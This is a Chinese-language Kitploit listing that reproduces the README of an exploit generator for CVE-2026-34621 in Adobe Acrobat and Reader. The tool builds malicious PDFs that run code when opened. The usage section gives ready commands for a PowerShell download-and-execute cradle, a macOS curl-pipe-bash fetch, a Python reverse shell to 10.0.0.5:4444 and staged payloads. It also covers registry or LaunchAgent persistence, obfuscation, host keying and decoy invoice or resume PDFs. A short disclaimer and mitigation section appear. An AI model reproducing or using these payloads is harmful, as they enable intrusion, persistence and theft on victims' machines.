Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/null200ok/cve_2026_34621_advanced
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

一个复杂且跨平台的漏洞利用生成器,针对 **CVE-2026-34621** —— 这是 Adobe Acrobat 和 Reader 中的一个严重原型污染漏洞,可导致在 Windows 和 macOS 上实现沙箱逃逸及任意代码执行。

查看仓库
136125个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-34621 高级漏洞利用生成器

Python 3.7+ License

一个针对 CVE-2026-34621 的复杂跨平台漏洞利用生成器——这是 Adobe Acrobat 和 Reader 中的一个严重原型污染漏洞,可导致 Windows 和 macOS 上的沙箱逃逸及任意代码执行。

⚠️ 重要免责声明
本工具仅用于授权的安全研究和渗透测试。
未经授权对您不拥有或未获得明确书面许可的系统进行使用是非法的。作者对滥用行为不承担任何责任。


📋 目录

  • 概述
  • 功能特性
  • 安装
  • 快速开始
  • 使用示例
    • Windows 命令
    • macOS 命令
    • 移动端测试
  • 命令行选项
  • 工作原理
  • 受影响版本
  • 缓解措施
  • 贡献
  • 许可证

🔍 概述

CVE-2026-34621 是 Adobe Acrobat 和 Reader 中的一个零日漏洞,允许攻击者:

  1. 污染 Adobe 引擎内的 JavaScript 对象原型。
  2. 绕过安全沙箱。
  3. 在受害者机器上执行任意系统命令。

该生成器会创建一个恶意 PDF 文件,当在受影响版本的 Adobe Reader 中打开时,会自动执行针对受害者操作系统定制的载荷。

支持的目标平台:

  • ✅ Windows(完整任意代码执行)
  • ✅ macOS(完整任意代码执行)
  • ❌ Android / iOS(不受影响——仅演示回退)

✨ 功能特性

类别能力
跨平台载荷自动检测操作系统并选择相应的 Windows 或 macOS 命令执行方式。
多种执行向量cmd.exe、PowerShell、WScript.Shell(Windows)/ Terminal.app、osascript(macOS)。
分阶段载荷从远程 URL 下载并执行第二阶段载荷。
持久化安装注册表 Run 键(Windows)或 LaunchAgent(macOS)。
规避技术三级 JavaScript 混淆、环境密钥绑定、执行延迟、多态代码。
诱饵 PDF 嵌入将漏洞利用合并到看似合法的 PDF 中(需要 PyPDF2)。
多种触发方式OpenAction、页面打开动作或文档级 JavaScript。
全面报告生成 HTML、TXT 和 JSON 报告,详细说明载荷配置。

📦 安装

1. 克隆仓库

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2.(可选)创建虚拟环境

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. 安装依赖

核心脚本仅使用 Python 标准库。如需诱饵 PDF 合并功能,请安装 PyPDF2:

pip install PyPDF2

🚀 快速开始

生成一个在 Windows 和 macOS 上均能打开计算器的基本 PDF:

python3 cve_2026_34621_advanced.py -o test.pdf

这将生成:

test.pdf – 恶意 PDF 文件。

test_report.html – 详细 HTML 报告。

test_report.txt – 纯文本摘要。

test_config.json – JSON 配置导出。

💻 使用示例

Windows 命令

1-场景 命令

A-基本 calc.exe 弹窗

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

PowerShell 反向 Shell

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

带持久化的分阶段载荷

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

环境密钥绑定(仅在 "SALES-PC" 上运行)

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

混淆级别 2 并延迟 10 秒

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

macOS 命令

2-场景 命令

打开计算器

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

下载并执行脚本

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

通过 Python 实现反向 Shell

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

通过 LaunchAgent 实现持久化

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

嵌入诱饵 PDF

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-移动端测试说明

脚本本身在桌面端(Windows/macOS/Linux)运行以生成 PDF。生成的 PDF 可以在 Android 或 iOS 设备上打开,但:

移动版 Adobe Acrobat Reader 不受 CVE-2026-34621 影响。

载荷将触发良性的演示回退(打开 URL 或显示提示),而不是执行系统命令。

📖 命令行选项

选项 描述

-o、--output FILE 必需。输出 PDF 文件名。

--win CMD 要执行的 Windows 命令(默认:calc.exe)。

--mac CMD 要执行的 macOS 命令(默认:open /System/Applications/Calculator.app)。

--stage URL 用于下载第二阶段载荷的 URL。

-p、--persistence 安装持久化机制(注册表/LaunchAgent)。

-O、--obfuscate LEVEL JavaScript 混淆级别(0=无,1=基础,2=中级,3=高级)。

-d、--delay SECONDS 延迟指定秒数后执行。

-k、--key HOSTNAME 环境密钥绑定——仅在匹配的主机名上执行。

-l、--lure PDF 用作诱饵的合法 PDF 路径(合并漏洞利用)。

--trigger TYPE 触发向量:openaction、pageopen 或 doclevel。

--no-reports 跳过生成 HTML/TXT/JSON 报告。

--seed N 设置随机种子以实现可复现的多态生成。

⚙️ 工作原理

攻击链

原型污染:

嵌入的 JavaScript 修改 Object.prototype 以注入恶意属性(__trusted、privileged 等)。这会混淆 Adobe JavaScript 引擎的信任边界。

上下文提升

由于原型被污染,引擎错误地将不受信任的文档 JavaScript 视为在特权上下文中运行。

特权 API 访问

脚本现在可以调用受限 API,如 app.launchURL、util.readFileIntoStream 和 app.trustedFunction。

沙箱逃逸

这些 API 允许在 Adobe 沙箱之外进行文件系统访问和进程执行。

任意代码执行

脚本使用操作系统特定的方法执行攻击者的命令:

Windows:cmd.exe /c、PowerShell 或 WScript.Shell。

macOS:Terminal.app URL 处理器或 osascript。

混淆级别

级别 描述

0 无混淆——纯可读 JavaScript。

1 字符串字面量转换为 String.fromCharCode,变量名随机化。

2 级别 1 + 死代码注入和垃圾注释。

3 整个脚本进行 base64 编码并包装在 eval(atob(...)) 中,然后再次混淆。

🛡️ 受影响版本

产品 轨道 受影响版本 已修补版本

Adobe Acrobat DC 持续 ≤ 26.001.21367 26.001.21411

Adobe Acrobat Reader DC 持续 ≤ 26.001.21367 26.001.21411

Adobe Acrobat 2024 经典 ≤ 24.001.30356 24.001.30362(Windows)/ 24.001.30360(macOS)

🛠️ 缓解措施

立即更新:应用 Adobe 的最新安全更新。

在 Adobe Reader 中禁用 JavaScript:编辑 → 首选项 → JavaScript → 取消勾选"启用 Acrobat JavaScript"(注意:这会破坏某些 PDF 功能)。

使用替代 PDF 查看器:考虑使用不受影响的浏览器或第三方查看器。

🤝 贡献

欢迎贡献,但请注意:

所有拉取请求必须用于防御性研究、检测改进或报告增强。

我们不接受超出合法测试所需范围、增加工具攻击能力的贡献。

贡献方式:

Fork 仓库。

创建功能分支。

提交带有清晰变更描述的拉取请求。

📄 许可证

本项目仅用于教育和授权安全测试目的。

使用本软件即表示您同意自行负责遵守所有适用的法律法规。

作者对因使用本工具造成的任何滥用或损害不承担任何责任。

下载工具